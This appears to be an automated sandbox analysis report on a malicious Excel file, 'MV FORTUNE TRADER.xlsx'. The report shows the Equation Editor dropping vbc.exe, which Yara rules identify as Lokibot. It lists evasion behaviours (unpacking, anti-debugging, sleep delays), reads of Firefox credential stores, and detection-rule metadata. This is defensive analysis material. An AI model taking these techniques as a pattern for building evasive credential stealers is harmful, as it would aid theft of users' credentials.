Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040549C	4_2_0040549C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004029D4	4_2_004029D4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00222C24	4_2_00222C24
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002256EC	4_2_002256EC

Source: MV FORTUNE TRADER.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\Public\vbc.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

4_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR138.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MV FORTUNE TRADER.xlsx

Static file information: File size 2551296 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: MV FORTUNE TRADER.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MV FORTUNE TRADER.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 4.2.vbc.exe.400000.1.unpack

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match	File source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402AC0 push eax; ret	4_2_00402AD4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402AC0 push eax; ret	4_2_00402AFC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00222D10 push eax; ret	4_2_00222D24
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00222D10 push eax; ret	4_2_00222D4C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0525BD22 push es; ret	4_2_0525BD24
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0525E027 push ebp; ret	4_2_0525E02A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0525B463 push eax; ret	4_2_0525B47E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0525EA1F push edi; retf	4_2_0525EA20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0525EE79 push E83768D8h; retf	4_2_0525EE7E

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: MV FORTUNE TRADER.xlsx

Stream path 'EncryptedPackage' entropy: 7.99992623739 (max. 8.0)

Malware Analysis System Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 948

Thread sleep time: -420000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403D74 FindFirstFileW,

4_2_00403D74

Anti Debugging:

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]	4_2_0040317B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]	4_2_0022092B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]	4_2_00220D90
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002233CB mov eax, dword ptr fs:[00000030h]	4_2_002233CB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_052593E3 push dword ptr fs:[00000030h]	4_2_052593E3

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,

4_2_00402B7C

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00406069 GetUserNameW,

4_2_00406069

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Yara detected Lokibot

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY

